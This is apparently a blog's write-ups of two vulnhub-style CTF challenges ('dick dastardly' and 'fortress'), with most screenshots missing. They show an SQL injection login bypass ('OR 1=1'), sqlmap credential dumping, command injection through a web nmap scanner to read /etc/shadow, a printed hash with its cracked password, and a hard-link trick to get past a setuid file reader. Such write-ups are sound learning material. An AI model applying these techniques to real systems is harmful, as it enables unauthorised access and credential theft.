Monday 13 February 2017

DC146:2016 dick dastardly

Hello,

Now it is turn to dick dastardly challenge!

Scanning all ports...






Enumerating web pages


















Excellent! The dirb scanner found several interesting files on our target.
The admin.php redirect us to index.php










Very interesting. Filling in username as admin and password as ' OR 1=1 -- - we have got following result





















Nice! Now we are able to use sqlmap and try to find valid credentials.








Good, let's enumerate deeper! Unfortunately we are not able to retrieve databases names. So, we have to look for other opportunity to get these names.











Excellent! We found second vulnerable parameter. Let's enumerate databases






Very good, let's examine vulnhub database.
Database: vulnhub
Table: admins
[1 entry]
+----+--------------------------------------+--------+
| id | pass                                 | user   |
+----+--------------------------------------+--------+
| 1  | 1b37y0uc4n76u3557h15p455w0rd,5uck3rz | rasta  |
+----+--------------------------------------+--------+
It is not SSH valid password for rasta username :( I don't know for what is the password.
After clicking on add IP to IRC whitelist I performed nmap scanning again and I have got very interesting result













Very good! I installed irssi on my attacker machine and I connected to our target IRC.















Thursday 9 February 2017

DC146:2016 fortress challenge

Hello,
Now it is time to struggle with fortress challenge.

Scanning phase gave us following result









Our situation is very simple, but only three open ports.
So, let's begin our penetration tests from web application.













Excellent! We discovered scanner.php file. Let's examine it.












OK, we know how work this scanner. We know how looks like nmap command which is utilize by the scanner.









We added id, so let's verify how looks like result.
















Excellent! It works.So, let's try examine target deeper.













Great! We have got something like one line from /etc/shadow.
After a lot of time...
$6$qAgPM2TEordSoFnH$4uPUAhB.9rORkWExA8jI0Sbwn0Bj50KAK0tJ4rkrUrIkP6v.gE/6Fw9/yn1Ejl2TedyN5ziUz8N0unsHocuks.:931qwerty?
 Good, so we know that SSH port is open.


























We obtained limited shell!Unfortunately goal of this challenge is finding flags only.

Flag #1
$ cat flag.txt
FLAG{w0uld_u_lik3_som3_b33r_with_ur_r3d_PiLL}
$ pwd
/usr/home/craven
Flag #2
Looking for next flag I found in the /usr/local/www/ directory
$ ls
index.html    k1ngd0m_k3yz    logo.png    s1kr3t        scanner.php    styles.css
$ cd s1kr3t/
$ ls
flag.txt
$ cat flag.txt
FLAG{n0_one_br3aches_teh_f0rt}
Flag #3
The last flag is located in /home/vulnhub/ directory
$ ls
flag.txt    reader
$ cat flag.txt
cat: flag.txt: Permission denied
Hmmm, it is not surprise for me :-) So, let's examine reader file
$ file reader
reader: setuid ELF 64-bit LSB executable, x86-64, version 1 (FreeBSD), dynamically linked, interpreter /libexec/ld-elf.so.1, for FreeBSD 11.0 (1100122), FreeBSD-style, not stripped
$ ./reader
./reader [file to read]
Very useful! We know that we are able to read some files using reader file.
$ ./reader /etc/passwd
Checking file type...
Checking if flag file...
Great! Printing file contents...
Win, here's your flag:
# $FreeBSD: releng/11.0/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $
Hmmm, a little strange.
$ ./reader flag.txt
Checking file type...
Checking if flag file...
Nope. Can't let you have the flag.
Hmmm, let's try create symlink for flag.txt
$ ln -s flag.txt /tmp/flagg.txt
$ ./reader /tmp/flagg.txt
Checking file type...
Symbolic links not allowed!
Grrrr, maybe hard link will conduct us to success?
$ ln -f flag.txt /tmp/flagh.txt
$ ./reader /tmp/flagh.txt
Checking file type...
Checking if flag file...
Nope. Can't let you have the flag.
$ ln -f flag.txt /tmp/test
$ ./reader /tmp/test
Checking file type...
Checking if flag file...
Great! Printing file contents...
Win, here's your flag:
FLAG{its_A_ph0t0_ph1ni5h}
It is end of the challenge :)